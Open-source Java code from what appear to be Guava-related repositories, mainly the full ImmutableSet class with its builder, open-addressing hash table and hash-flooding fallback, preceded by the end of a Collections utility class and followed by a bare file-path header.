int size = lst.size(); // Rotating an empty collection results in the same empty collection if (size == 0) { return; } // Normalize the distance int normdist = dist % size; if (normdist == 0) { return; } // Transform a rotation to the left into the equivalent rotation to the right. if (normdist < 0) { normdist += size; } if (lst instanceof RandomAccess) { List<Object> list = (List<Object>) lst; // Move each element to the new location. Object temp = list.get(0); int index = 0, beginIndex = 0; for (int i = 0; i < size; i++) { index = (index + normdist) % size; temp = list.set(index, temp); if (index == beginIndex) { index = ++beginIndex; temp = list.get(beginIndex); } } } else { int divideIndex = size - normdist; List<?> sublist1 = lst.subList(0, divideIndex); List<?> sublist2 = lst.subList(divideIndex, size); reverse(sublist1); reverse(sublist2); reverse(lst); } } public static void shuffle(List<?> list) { shuffle(list, RandomHolder.rnd); } @SuppressWarnings("unchecked") public static void shuffle(List<?> list, Random rnd) { if (list instanceof RandomAccess) { for (int i = list.size() - 1; i >= 1; i--) { swapImpl(list, i, rnd.nextInt(i + 1)); } } else { Object arr[] = list.toArray(); for (int i = arr.length - 1; i >= 1; i--) { swapImpl(arr, i, rnd.nextInt(i + 1)); } ListIterator it = list.listIterator(); for (Object e : arr) { it.next(); it.set(e); } } } public static <T> Set<T> singleton(T o) { HashSet<T> set = new HashSet<T>(1); set.add(o); return unmodifiableSet(set); } // TODO(tobyr) Is it worth creating custom singleton sets, lists, and maps? // More efficient at runtime, but more code bloat to download public static <T> List<T> singletonList(T o) { return new SingletonList<T>(o); } public static <K, V> Map<K, V> singletonMap(K key, V value) { Map<K, V> map = new HashMap<K, V>(1); map.put(key, value); return unmodifiableMap(map); } public static <T> void sort(List<T> target) { target.sort(null); } public static <T> void sort(List<T> target, Comparator<? super T> c) { target.sort(c); } public static void swap(List<?> list, int i, int j) { swapImpl(list, i, j); } public static <T> Collection<T> unmodifiableCollection(final Collection<? extends T> coll) { return new UnmodifiableCollection<T>(coll); } public static <T> List<T> unmodifiableList(List<? extends T> list) { return (list instanceof RandomAccess) ? new UnmodifiableRandomAccessList<T>(list) : new UnmodifiableList<T>(list); } static <E> List<E> internalListOf(E[] elements) { if (isApiChecked()) { for (int i = 0; i < elements.length; i++) { checkNotNull(elements[i]); } } return new UnmodifiableRandomAccessList<E>( elements.length == 0 ? emptyList() : Arrays.asList(elements)); } static <E> Set<E> internalSetOf(E[] elements, boolean allowDuplicates) { if (elements.length == 0) { return Collections.unmodifiableSet(emptySet()); } Set<E> set = new HashSet<>(); for (int i = 0; i < elements.length; i++) { boolean added = set.add(checkNotNull(elements[i])); if (!allowDuplicates) { checkArgument(added, "Duplicate element"); } } return Collections.unmodifiableSet(set); } // Marked as JsMethod to take advantage of JS varargs. @JsMethod static <K, V> Map<K, V> internalMapOf(Object... elements) { if (elements.length == 0) { return Collections.unmodifiableMap(emptyMap()); } Map<K, V> map = new HashMap<>(); for (int i = 0; i < elements.length; i = i + 2) { V old = map.put((K) checkNotNull(elements[i]), (V) checkNotNull(elements[i + 1])); checkArgument(old == null, "Duplicate element"); } return Collections.unmodifiableMap(map); } static <K, V> Map<K, V> internalMapFromEntries( Collection<? extends Entry<? extends K, ? extends V>> entries) { if (entries.isEmpty()) { return Collections.unmodifiableMap(emptyMap()); } Map<K, V> map = new HashMap<>(); for (Entry<? extends K, ? extends V> entry : entries) { checkNotNull(entry); V old = map.put(checkNotNull(entry.getKey()), checkNotNull(entry.getValue())); checkArgument(old == null, "Duplicate element"); } return Collections.unmodifiableMap(map); } public static <K, V> Map<K, V> unmodifiableMap(final Map<? extends K, ? extends V> map) { return new UnmodifiableMap<K, V>(map); } public static <T> Set<T> unmodifiableSet(Set<? extends T> set) { return new UnmodifiableSet<T>(set); } public static <K, V> SortedMap<K, V> unmodifiableSortedMap(SortedMap<K, ? extends V> map) { return new UnmodifiableSortedMap<K, V>(map); } public static <T> SortedSet<T> unmodifiableSortedSet(SortedSet<T> set) { return new UnmodifiableSortedSet<T>(set); } /** Computes hash code without preserving elements order (e.g. HashSet). */ static <T> int hashCode(Iterable<T> collection) { int hashCode = 0; for (T e : collection) { hashCode = hashCode + Objects.hashCode(e); } return hashCode; } /** Computes hash code preserving collection order (e.g. ArrayList). */ static <T> int hashCode(List<T> list) { int hashCode = 1; for (T e : list) { hashCode = 31 * hashCode + Objects.hashCode(e); } return hashCode; } private static <T> void swapImpl(List<T> list, int i, int j) { T t = list.get(i); list.set(i, list.get(j)); list.set(j, t); } private static void swapImpl(Object[] a, int i, int j) { Object obj = a[i]; a[i] = a[j]; a[j] = obj; } private Collections() {} }
google/guava
36,011
guava/src/com/google/common/collect/ImmutableSet.java
/* * Copyright (C) 2007 The Guava Authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.common.collect; import static com.google.common.base.Preconditions.checkArgument; import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.CollectPreconditions.checkNonnegative; import static com.google.common.collect.ImmutableList.asImmutableList; import static com.google.common.math.IntMath.sqrt; import static java.lang.Math.max; import static java.util.Objects.requireNonNull; import com.google.common.annotations.GwtCompatible; import com.google.common.annotations.GwtIncompatible; import com.google.common.annotations.J2ktIncompatible; import com.google.common.annotations.VisibleForTesting; import com.google.common.math.IntMath; import com.google.common.primitives.Ints; import com.google.errorprone.annotations.CanIgnoreReturnValue; import com.google.errorprone.annotations.concurrent.LazyInit; import com.google.j2objc.annotations.RetainedWith; import java.io.InvalidObjectException; import java.io.ObjectInputStream; import java.io.Serializable; import java.math.RoundingMode; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.EnumSet; import java.util.Iterator; import java.util.Set; import java.util.SortedSet; import java.util.Spliterator; import java.util.function.Consumer; import java.util.stream.Collector; import org.jspecify.annotations.Nullable; /** * A {@link Set} whose contents will never change, with many other important properties detailed at * {@link ImmutableCollection}. * * @since 2.0 */ @GwtCompatible @SuppressWarnings("serial") // we're overriding default serialization public abstract class ImmutableSet<E> extends ImmutableCollection<E> implements Set<E> { static final int SPLITERATOR_CHARACTERISTICS = ImmutableCollection.SPLITERATOR_CHARACTERISTICS | Spliterator.DISTINCT; /** * Returns a {@code Collector} that accumulates the input elements into a new {@code * ImmutableSet}. Elements appear in the resulting set in the encounter order of the stream; if * the stream contains duplicates (according to {@link Object#equals(Object)}), only the first * duplicate in encounter order will appear in the result. * * @since 21.0 */ public static <E> Collector<E, ?, ImmutableSet<E>> toImmutableSet() { return CollectCollectors.toImmutableSet(); } /** * Returns the empty immutable set. Preferred over {@link Collections#emptySet} for code * consistency, and because the return type conveys the immutability guarantee. * * <p><b>Performance note:</b> the instance returned is a singleton. */ @SuppressWarnings({"unchecked"}) // fully variant implementation (never actually produces any Es) public static <E> ImmutableSet<E> of() { return (ImmutableSet<E>) RegularImmutableSet.EMPTY; } /** * Returns an immutable set containing the given element. Preferred over {@link * Collections#singleton} for code consistency, {@code null} rejection, and because the return * type conveys the immutability guarantee. */ public static <E> ImmutableSet<E> of(E e1) { return new SingletonImmutableSet<>(e1); } /* * TODO: b/315526394 - Skip the Builder entirely for the of(...) methods, since we don't need to * worry that we might trigger the fallback to the JDK-backed implementation? (The varargs one * _could_, so we could keep it as it is. Or we could convince ourselves that hash flooding is * unlikely in practice there, too.) */ /** * Returns an immutable set containing the given elements, minus duplicates, in the order each was * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except * the first are ignored. */ public static <E> ImmutableSet<E> of(E e1, E e2) { return new RegularSetBuilderImpl<E>(2).add(e1).add(e2).review().build(); } /** * Returns an immutable set containing the given elements, minus duplicates, in the order each was * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except * the first are ignored. */ public static <E> ImmutableSet<E> of(E e1, E e2, E e3) { return new RegularSetBuilderImpl<E>(3).add(e1).add(e2).add(e3).review().build(); } /** * Returns an immutable set containing the given elements, minus duplicates, in the order each was * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except * the first are ignored. */ public static <E> ImmutableSet<E> of(E e1, E e2, E e3, E e4) { return new RegularSetBuilderImpl<E>(4).add(e1).add(e2).add(e3).add(e4).review().build(); } /** * Returns an immutable set containing the given elements, minus duplicates, in the order each was * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except * the first are ignored. */ public static <E> ImmutableSet<E> of(E e1, E e2, E e3, E e4, E e5) { return new RegularSetBuilderImpl<E>(5).add(e1).add(e2).add(e3).add(e4).add(e5).review().build(); } /** * Returns an immutable set containing the given elements, minus duplicates, in the order each was * first specified. That is, if multiple elements are {@linkplain Object#equals equal}, all except * the first are ignored. * * <p>The array {@code others} must not be longer than {@code Integer.MAX_VALUE - 6}. * * @since 3.0 (source-compatible since 2.0) */ @SafeVarargs // For Eclipse. For internal javac we have disabled this pointless type of warning. public static <E> ImmutableSet<E> of(E e1, E e2, E e3, E e4, E e5, E e6, E... others) { checkArgument( others.length <= Integer.MAX_VALUE - 6, "the total number of elements must fit in an int"); SetBuilderImpl<E> builder = new RegularSetBuilderImpl<>(6 + others.length); builder = builder.add(e1).add(e2).add(e3).add(e4).add(e5).add(e6); for (int i = 0; i < others.length; i++) { builder = builder.add(others[i]); } return builder.review().build(); } /** * Returns an immutable set containing each of {@code elements}, minus duplicates, in the order * each appears first in the source collection. * * <p><b>Performance note:</b> This method will sometimes recognize that the actual copy operation * is unnecessary; for example, {@code copyOf(copyOf(anArrayList))} will copy the data only once. * This reduces the expense of habitually making defensive copies at API boundaries. However, the * precise conditions for skipping the copy operation are undefined. * * @throws NullPointerException if any of {@code elements} is null * @since 7.0 (source-compatible since 2.0) */ public static <E> ImmutableSet<E> copyOf(Collection<? extends E> elements) { /* * TODO(lowasser): consider checking for ImmutableAsList here * TODO(lowasser): consider checking for Multiset here */ // Don't refer to ImmutableSortedSet by name so it won't pull in all that code if (elements instanceof ImmutableSet && !(elements instanceof SortedSet)) { @SuppressWarnings("unchecked") // all supported methods are covariant ImmutableSet<E> set = (ImmutableSet<E>) elements; if (!set.isPartialView()) { return set; } } else if (elements instanceof EnumSet) { EnumSet<?> clone = ((EnumSet<?>) elements).clone(); ImmutableSet<?> untypedResult = ImmutableEnumSet.asImmutable(clone); /* * The result has the same type argument we started with. We just couldn't express EnumSet<E> * or ImmutableEnumSet<E> along the way because our own <E> isn't <E extends Enum<E>>. */ @SuppressWarnings("unchecked") ImmutableSet<E> result = (ImmutableSet<E>) untypedResult; return result; } if (elements.isEmpty()) { // We avoid allocating anything. return of(); } // Collection<E>.toArray() is required to contain only E instances, and all we do is read them. // TODO(cpovirk): Consider using Object[] anyway. @SuppressWarnings("unchecked") E[] array = (E[]) elements.toArray(); /* * For a Set, we guess that it contains no duplicates. That's just a guess for purpose of * sizing; if the Set uses different equality semantics, it might contain duplicates according * to equals(), and we will deduplicate those properly, albeit at some cost in allocations. */ int expectedSize = elements instanceof Set ? array.length : estimatedSizeForUnknownDuplication(array.length); return fromArrayWithExpectedSize(array, expectedSize); } /** * Returns an immutable set containing each of {@code elements}, minus duplicates, in the order * each appears first in the source iterable. This method iterates over {@code elements} only * once. * * <p><b>Performance note:</b> This method will sometimes recognize that the actual copy operation * is unnecessary; for example, {@code copyOf(copyOf(anArrayList))} should copy the data only * once. This reduces the expense of habitually making defensive copies at API boundaries. * However, the precise conditions for skipping the copy operation are undefined. * * @throws NullPointerException if any of {@code elements} is null */ public static <E> ImmutableSet<E> copyOf(Iterable<? extends E> elements) { return (elements instanceof Collection) ? copyOf((Collection<? extends E>) elements) : copyOf(elements.iterator()); } /** * Returns an immutable set containing each of {@code elements}, minus duplicates, in the order * each appears first in the source iterator. * * @throws NullPointerException if any of {@code elements} is null */ public static <E> ImmutableSet<E> copyOf(Iterator<? extends E> elements) { // We special-case for 0 or 1 elements, but anything further is madness. if (!elements.hasNext()) { return of(); } E first = elements.next(); if (!elements.hasNext()) { return of(first); } else { return new ImmutableSet.Builder<E>().add(first).addAll(elements).build(); } } /** * Returns an immutable set containing each of {@code elements}, minus duplicates, in the order * each appears first in the source array. * * @throws NullPointerException if any of {@code elements} is null * @since 3.0 */ public static <E> ImmutableSet<E> copyOf(E[] elements) { return fromArrayWithExpectedSize(elements, estimatedSizeForUnknownDuplication(elements.length)); } private static <E> ImmutableSet<E> fromArrayWithExpectedSize(E[] elements, int expectedSize) { switch (elements.length) { case 0: return of(); case 1: return of(elements[0]); default: SetBuilderImpl<E> builder = new RegularSetBuilderImpl<>(expectedSize); for (int i = 0; i < elements.length; i++) { builder = builder.add(elements[i]); } return builder.review().build(); } } ImmutableSet() {} /** Returns {@code true} if the {@code hashCode()} method runs quickly. */ boolean isHashCodeFast() { return false; } @Override public boolean equals(@Nullable Object object) { if (object == this) { return true; } if (object instanceof ImmutableSet && isHashCodeFast() && ((ImmutableSet<?>) object).isHashCodeFast() && hashCode() != object.hashCode()) { return false; } return Sets.equalsImpl(this, object); } @Override public int hashCode() { return Sets.hashCodeImpl(this); } // This declaration is needed to make Set.iterator() and // ImmutableCollection.iterator() consistent. @Override public abstract UnmodifiableIterator<E> iterator(); abstract static class CachingAsList<E> extends ImmutableSet<E> { @LazyInit @RetainedWith private transient @Nullable ImmutableList<E> asList; @Override public ImmutableList<E> asList() { ImmutableList<E> result = asList; if (result == null) { return asList = createAsList(); } else { return result; } } ImmutableList<E> createAsList() { return new RegularImmutableAsList<>(this, toArray()); } // redeclare to help optimizers with b/310253115 @SuppressWarnings("RedundantOverride") @Override @J2ktIncompatible @GwtIncompatible Object writeReplace() { return super.writeReplace(); } } abstract static class Indexed<E> extends CachingAsList<E> { abstract E get(int index); @Override public UnmodifiableIterator<E> iterator() { return asList().iterator(); } @Override public Spliterator<E> spliterator() { return CollectSpliterators.indexed(size(), SPLITERATOR_CHARACTERISTICS, this::get); } @Override public void forEach(Consumer<? super E> consumer) { checkNotNull(consumer); int n = size(); for (int i = 0; i < n; i++) { consumer.accept(get(i)); } } @Override int copyIntoArray(@Nullable Object[] dst, int offset) { return asList().copyIntoArray(dst, offset); } @Override ImmutableList<E> createAsList() { return new ImmutableAsList<E>() { @Override public E get(int index) { return Indexed.this.get(index); } @Override Indexed<E> delegateCollection() { return Indexed.this; } // redeclare to help optimizers with b/310253115 @SuppressWarnings("RedundantOverride") @Override @J2ktIncompatible @GwtIncompatible Object writeReplace() { return super.writeReplace(); } }; } // redeclare to help optimizers with b/310253115 @SuppressWarnings("RedundantOverride") @Override @J2ktIncompatible @GwtIncompatible Object writeReplace() { return super.writeReplace(); } } /* * This class is used to serialize all ImmutableSet instances, except for * ImmutableEnumSet/ImmutableSortedSet, regardless of implementation type. It * captures their "logical contents" and they are reconstructed using public * static factories. This is necessary to ensure that the existence of a * particular implementation type is an implementation detail. */ @J2ktIncompatible // serialization private static final class SerializedForm implements Serializable { final Object[] elements; SerializedForm(Object[] elements) { this.elements = elements; } Object readResolve() { return copyOf(elements); } @GwtIncompatible @J2ktIncompatible private static final long serialVersionUID = 0; } @Override @J2ktIncompatible Object writeReplace() { return new SerializedForm(toArray()); } @J2ktIncompatible private void readObject(ObjectInputStream stream) throws InvalidObjectException { throw new InvalidObjectException("Use SerializedForm"); } /** * Returns a new builder. The generated builder is equivalent to the builder created by the {@link * Builder} constructor. */ public static <E> Builder<E> builder() { return new Builder<>(); } /** * Returns a new builder, expecting the specified number of distinct elements to be added. * * <p>If {@code expectedSize} is exactly the number of distinct elements added to the builder * before {@link Builder#build} is called, the builder is likely to perform better than an unsized * {@link #builder()} would have. * * <p>It is not specified if any performance benefits apply if {@code expectedSize} is close to, * but not exactly, the number of distinct elements added to the builder. * * @since 23.1 */ public static <E> Builder<E> builderWithExpectedSize(int expectedSize) { checkNonnegative(expectedSize, "expectedSize"); return new Builder<>(expectedSize); } /** * A builder for creating {@code ImmutableSet} instances. Example: * * {@snippet : * static final ImmutableSet<Color> GOOGLE_COLORS = * ImmutableSet.<Color>builder() * .addAll(WEBSAFE_COLORS) * .add(new Color(0, 191, 255)) * .build(); * } * * <p>Elements appear in the resulting set in the same order they were first added to the builder. * * <p>Building does not change the state of the builder, so it is still possible to add more * elements and to build again. * * @since 2.0 */ public static class Builder<E> extends ImmutableCollection.Builder<E> { /* * `impl` is null only for instances of the subclass, ImmutableSortedSet.Builder. That subclass * overrides all the methods that access it here. Thus, all the methods here can safely assume * that this field is non-null. */ private @Nullable SetBuilderImpl<E> impl; boolean forceCopy; public Builder() { this(0); } Builder(int capacity) { if (capacity > 0) { impl = new RegularSetBuilderImpl<>(capacity); } else { impl = EmptySetBuilderImpl.instance(); } } Builder(@SuppressWarnings("unused") boolean subclass) { this.impl = null; // unused } @VisibleForTesting void forceJdk() { requireNonNull(impl); // see the comment on the field this.impl = new JdkBackedSetBuilderImpl<>(impl); } final void copyIfNecessary() { if (forceCopy) { copy(); forceCopy = false; } } void copy() { requireNonNull(impl); // see the comment on the field impl = impl.copy(); } @Override @CanIgnoreReturnValue public Builder<E> add(E element) { requireNonNull(impl); // see the comment on the field checkNotNull(element); copyIfNecessary(); impl = impl.add(element); return this; } @Override @CanIgnoreReturnValue public Builder<E> add(E... elements) { super.add(elements); return this; } /** * Adds each element of {@code elements} to the {@code ImmutableSet}, ignoring duplicate * elements (only the first duplicate element is added). * * @param elements the elements to add * @return this {@code Builder} object * @throws NullPointerException if {@code elements} is null or contains a null element */ @Override @CanIgnoreReturnValue public Builder<E> addAll(Iterable<? extends E> elements) { super.addAll(elements); return this; } @Override @CanIgnoreReturnValue public Builder<E> addAll(Iterator<? extends E> elements) { super.addAll(elements); return this; } @CanIgnoreReturnValue Builder<E> combine(Builder<E> other) { requireNonNull(impl); requireNonNull(other.impl); /* * For discussion of requireNonNull, see the comment on the field. * * (And I don't believe there's any situation in which we call x.combine(y) when x is a plain * ImmutableSet.Builder but y is an ImmutableSortedSet.Builder (or vice versa). Certainly * ImmutableSortedSet.Builder.combine() is written as if its argument will never be a plain * ImmutableSet.Builder: It casts immediately to ImmutableSortedSet.Builder.) */ copyIfNecessary(); this.impl = this.impl.combine(other.impl); return this; } @Override public ImmutableSet<E> build() { requireNonNull(impl); // see the comment on the field forceCopy = true; impl = impl.review(); return impl.build(); } } /** Swappable internal implementation of an ImmutableSet.Builder. */ private abstract static class SetBuilderImpl<E> { // The first `distinct` elements are non-null. // Since we can never access null elements, we don't mark this nullable. E[] dedupedElements; int distinct; @SuppressWarnings("unchecked") SetBuilderImpl(int expectedCapacity) { this.dedupedElements = (E[]) new Object[expectedCapacity]; this.distinct = 0; } /** Initializes this SetBuilderImpl with a copy of the deduped elements array from toCopy. */ SetBuilderImpl(SetBuilderImpl<E> toCopy) { this.dedupedElements = Arrays.copyOf(toCopy.dedupedElements, toCopy.dedupedElements.length); this.distinct = toCopy.distinct; } /** * Resizes internal data structures if necessary to store the specified number of distinct * elements. */ private void ensureCapacity(int minCapacity) { if (minCapacity > dedupedElements.length) { int newCapacity = ImmutableCollection.Builder.expandedCapacity(dedupedElements.length, minCapacity); dedupedElements = Arrays.copyOf(dedupedElements, newCapacity); } } /** Adds e to the insertion-order array of deduplicated elements. Calls ensureCapacity. */ final void addDedupedElement(E e) { ensureCapacity(distinct + 1); dedupedElements[distinct++] = e; } /** * Adds e to this SetBuilderImpl, returning the updated result. Only use the returned * SetBuilderImpl, since we may switch implementations if e.g. hash flooding is detected. */ abstract SetBuilderImpl<E> add(E e); /** Adds all the elements from the specified SetBuilderImpl to this SetBuilderImpl. */ final SetBuilderImpl<E> combine(SetBuilderImpl<E> other) { SetBuilderImpl<E> result = this; for (int i = 0; i < other.distinct; i++) { /* * requireNonNull is safe because we ensure that the first `distinct` elements have been * populated. */ result = result.add(requireNonNull(other.dedupedElements[i])); } return result; } /** * Creates a new copy of this SetBuilderImpl. Modifications to that SetBuilderImpl will not * affect this SetBuilderImpl or sets constructed from this SetBuilderImpl via build(). */ abstract SetBuilderImpl<E> copy(); /** * Call this before build(). Does a final check on the internal data structures, e.g. shrinking * unnecessarily large structures or detecting previously unnoticed hash flooding. */ SetBuilderImpl<E> review() { return this; } abstract ImmutableSet<E> build(); } private static final class EmptySetBuilderImpl<E> extends SetBuilderImpl<E> { private static final EmptySetBuilderImpl<Object> INSTANCE = new EmptySetBuilderImpl<>(); @SuppressWarnings("unchecked") static <E> SetBuilderImpl<E> instance() { return (SetBuilderImpl<E>) INSTANCE; } private EmptySetBuilderImpl() { super(0); } @Override SetBuilderImpl<E> add(E e) { return new RegularSetBuilderImpl<E>(Builder.DEFAULT_INITIAL_CAPACITY).add(e); } @Override SetBuilderImpl<E> copy() { return this; } @Override ImmutableSet<E> build() { return ImmutableSet.of(); } } // We use power-of-2 tables, and this is the highest int that's a power of 2 static final int MAX_TABLE_SIZE = Ints.MAX_POWER_OF_TWO; // Represents how tightly we can pack things, as a maximum. private static final double DESIRED_LOAD_FACTOR = 0.7; // If the set has this many elements, it will "max out" the table size private static final int CUTOFF = (int) (MAX_TABLE_SIZE * DESIRED_LOAD_FACTOR); /** * Returns an array size suitable for the backing array of a hash table that uses open addressing * with linear probing in its implementation. The returned size is the smallest power of two that * can hold setSize elements with the desired load factor. Always returns at least setSize + 2. */ // TODO(cpovirk): Move to Hashing or something, since it's used elsewhere in the Android version. static int chooseTableSize(int setSize) { setSize = max(setSize, 2); // Correct the size for open addressing to match desired load factor. if (setSize < CUTOFF) { // Round up to the next highest power of 2. int tableSize = Integer.highestOneBit(setSize - 1) << 1; while (tableSize * DESIRED_LOAD_FACTOR < setSize) { tableSize <<= 1; } return tableSize; } // The table can't be completely full or we'll get infinite reprobes checkArgument(setSize < MAX_TABLE_SIZE, "collection too large"); return MAX_TABLE_SIZE; } /** * Default implementation of the guts of ImmutableSet.Builder, creating an open-addressed hash * table and deduplicating elements as they come, so it only allocates O(max(distinct, * expectedCapacity)) rather than O(calls to add). * * <p>This implementation attempts to detect hash flooding, and if it's identified, falls back to * JdkBackedSetBuilderImpl. */ private static final class RegularSetBuilderImpl<E> extends SetBuilderImpl<E> { // null until at least two elements are present private @Nullable Object @Nullable [] hashTable; private int maxRunBeforeFallback; private int expandTableThreshold; private int hashCode; RegularSetBuilderImpl(int expectedCapacity) { super(expectedCapacity); this.hashTable = null; this.maxRunBeforeFallback = 0; this.expandTableThreshold = 0; } RegularSetBuilderImpl(RegularSetBuilderImpl<E> toCopy) { super(toCopy); this.hashTable = (toCopy.hashTable == null) ? null : toCopy.hashTable.clone(); this.maxRunBeforeFallback = toCopy.maxRunBeforeFallback; this.expandTableThreshold = toCopy.expandTableThreshold; this.hashCode = toCopy.hashCode; } @Override SetBuilderImpl<E> add(E e) { checkNotNull(e); if (hashTable == null) { if (distinct == 0) { addDedupedElement(e); return this; } else { ensureTableCapacity(dedupedElements.length); E elem = dedupedElements[0]; distinct--; return insertInHashTable(elem).add(e); } } return insertInHashTable(e); } private SetBuilderImpl<E> insertInHashTable(E e) { requireNonNull(hashTable); int eHash = e.hashCode(); int i0 = Hashing.smear(eHash); int mask = hashTable.length - 1; for (int i = i0; i - i0 < maxRunBeforeFallback; i++) { int index = i & mask; Object tableEntry = hashTable[index]; if (tableEntry == null) { addDedupedElement(e); hashTable[index] = e; hashCode += eHash; ensureTableCapacity(distinct); // rebuilds table if necessary return this; } else if (tableEntry.equals(e)) { // not a new element, ignore return this; } } // we fell out of the loop due to a long run; fall back to JDK impl return new JdkBackedSetBuilderImpl<E>(this).add(e); } @Override SetBuilderImpl<E> copy() { return new RegularSetBuilderImpl<>(this); } @Override SetBuilderImpl<E> review() { if (hashTable == null) { return this; } int targetTableSize = chooseTableSize(distinct); if (targetTableSize * 2 < hashTable.length) { hashTable = rebuildHashTable(targetTableSize, dedupedElements, distinct); maxRunBeforeFallback = maxRunBeforeFallback(targetTableSize); expandTableThreshold = (int) (DESIRED_LOAD_FACTOR * targetTableSize); } return hashFloodingDetected(hashTable) ? new JdkBackedSetBuilderImpl<E>(this) : this; } @Override ImmutableSet<E> build() { switch (distinct) { case 0: return of(); case 1: /* * requireNonNull is safe because we ensure that the first `distinct` elements have been * populated. */ return of(requireNonNull(dedupedElements[0])); default: /* * The suppression is safe because we ensure that the first `distinct` elements have been * populated. */ @SuppressWarnings("nullness") Object[] elements = (distinct == dedupedElements.length) ? dedupedElements : Arrays.copyOf(dedupedElements, distinct); return new RegularImmutableSet<>( elements, hashCode, requireNonNull(hashTable), hashTable.length - 1); } } /** Builds a new open-addressed hash table from the first n objects in elements. */ static @Nullable Object[] rebuildHashTable(int newTableSize, Object[] elements, int n) { @Nullable Object[] hashTable = new @Nullable Object[newTableSize]; int mask = hashTable.length - 1; for (int i = 0; i < n; i++) { // requireNonNull is safe because we ensure that the first n elements have been populated. Object e = requireNonNull(elements[i]); int j0 = Hashing.smear(e.hashCode()); for (int j = j0; ; j++) { int index = j & mask; if (hashTable[index] == null) { hashTable[index] = e; break; } } } return hashTable; } void ensureTableCapacity(int minCapacity) { int newTableSize; if (hashTable == null) { newTableSize = chooseTableSize(minCapacity); hashTable = new Object[newTableSize]; } else if (minCapacity > expandTableThreshold && hashTable.length < MAX_TABLE_SIZE) { newTableSize = hashTable.length * 2; hashTable = rebuildHashTable(newTableSize, dedupedElements, distinct); } else { return; } maxRunBeforeFallback = maxRunBeforeFallback(newTableSize); expandTableThreshold = (int) (DESIRED_LOAD_FACTOR * newTableSize); } /** * We attempt to detect deliberate hash flooding attempts. If one is detected, we fall back to a * wrapper around j.u.HashSet, which has built-in flooding protection. MAX_RUN_MULTIPLIER was * determined experimentally to match our desired probability of false positives. */ // NB: yes, this is surprisingly high, but that's what the experiments said was necessary // Raising this number slows the worst-case contains behavior, speeds up hashFloodingDetected, // and reduces the false-positive probability. static final int MAX_RUN_MULTIPLIER = 13; /** * Checks the whole hash table for poor hash distribution. Takes O(n) in the worst case, O(n / * log n) on average. * * <p>The online hash flooding detecting in RegularSetBuilderImpl.add can detect e.g. many * exactly matching hash codes, which would cause construction to take O(n^2), but can't detect * e.g. hash codes adversarially designed to go into ascending table locations, which keeps * construction O(n) (as desired) but then can have O(n) queries later. * * <p>If this returns false, then no query can take more than O(log n). * * <p>Note that for a RegularImmutableSet with elements with truly random hash codes, contains * operations take expected O(1) time but with high probability take O(log n) for at least some * element. (https://en.wikipedia.org/wiki/Linear_probing#Analysis) * * <p>This method may return {@code true} even on truly random input, but {@code * ImmutableSetTest} tests that the probability of that is low. */ static boolean hashFloodingDetected(@Nullable Object[] hashTable) { int maxRunBeforeFallback = maxRunBeforeFallback(hashTable.length); int mask = hashTable.length - 1; // Invariant: all elements at indices in [knownRunStart, knownRunEnd) are nonnull. // If knownRunStart == knownRunEnd, this is vacuously true. // When knownRunEnd exceeds hashTable.length, it "wraps", detecting runs around the end // of the table. int knownRunStart = 0; int knownRunEnd = 0; outerLoop: while (knownRunStart < hashTable.length) { if (knownRunStart == knownRunEnd && hashTable[knownRunStart] == null) { if (hashTable[(knownRunStart + maxRunBeforeFallback - 1) & mask] == null) { // There are only maxRunBeforeFallback - 1 elements between here and there, // so even if they were all nonnull, we wouldn't detect a hash flood. Therefore, // we can skip them all. knownRunStart += maxRunBeforeFallback; } else { knownRunStart++; // the only case in which maxRunEnd doesn't increase by mRBF // happens about f * (1-f) for f = DESIRED_LOAD_FACTOR, so around 21% of the time } knownRunEnd = knownRunStart; } else { for (int j = knownRunStart + maxRunBeforeFallback - 1; j >= knownRunEnd; j--) { if (hashTable[j & mask] == null) { knownRunEnd = knownRunStart + maxRunBeforeFallback; knownRunStart = j + 1; continue outerLoop; } } return true; } } return false; } /** * If more than this many consecutive positions are filled in a table of the specified size, * report probable hash flooding. ({@link #hashFloodingDetected} may also report hash flooding * if fewer consecutive positions are filled; see that method for details.) */ static int maxRunBeforeFallback(int tableSize) { return MAX_RUN_MULTIPLIER * IntMath.log2(tableSize, RoundingMode.UNNECESSARY); } } /** * SetBuilderImpl version that uses a JDK HashSet, which has built in hash flooding protection. */ private static final class JdkBackedSetBuilderImpl<E> extends SetBuilderImpl<E> { private final Set<Object> delegate; JdkBackedSetBuilderImpl(SetBuilderImpl<E> toCopy) { super(toCopy); // initializes dedupedElements and distinct delegate = Sets.newHashSetWithExpectedSize(distinct); for (int i = 0; i < distinct; i++) { /* * requireNonNull is safe because we ensure that the first `distinct` elements have been * populated. */ delegate.add(requireNonNull(dedupedElements[i])); } } @Override SetBuilderImpl<E> add(E e) { checkNotNull(e); if (delegate.add(e)) { addDedupedElement(e); } return this; } @Override SetBuilderImpl<E> copy() { return new JdkBackedSetBuilderImpl<>(this); } @Override ImmutableSet<E> build() { switch (distinct) { case 0: return of(); case 1: /* * requireNonNull is safe because we ensure that the first `distinct` elements have been * populated. */ return of(requireNonNull(dedupedElements[0])); default: return new JdkBackedImmutableSet<>(delegate, asImmutableList(dedupedElements, distinct)); } } } private static int estimatedSizeForUnknownDuplication(int inputElementsIncludingAnyDuplicates) { if (inputElementsIncludingAnyDuplicates < ImmutableCollection.Builder.DEFAULT_INITIAL_CAPACITY) { return inputElementsIncludingAnyDuplicates; } // Guess the size is "halfway between" all duplicates and no duplicates, on a log scale. return max( ImmutableCollection.Builder.DEFAULT_INITIAL_CAPACITY, sqrt(inputElementsIncludingAnyDuplicates, RoundingMode.CEILING)); } @GwtIncompatible @J2ktIncompatible private static final long serialVersionUID = 0xcafebabe; }
googleapis/google-cloud-java
35,832
java-discoveryengine/proto-google-cloud-discoveryengine-v1beta/src/main/java/com/google/cloud/discoveryengine/v1beta/UpdateSessionRequest.java
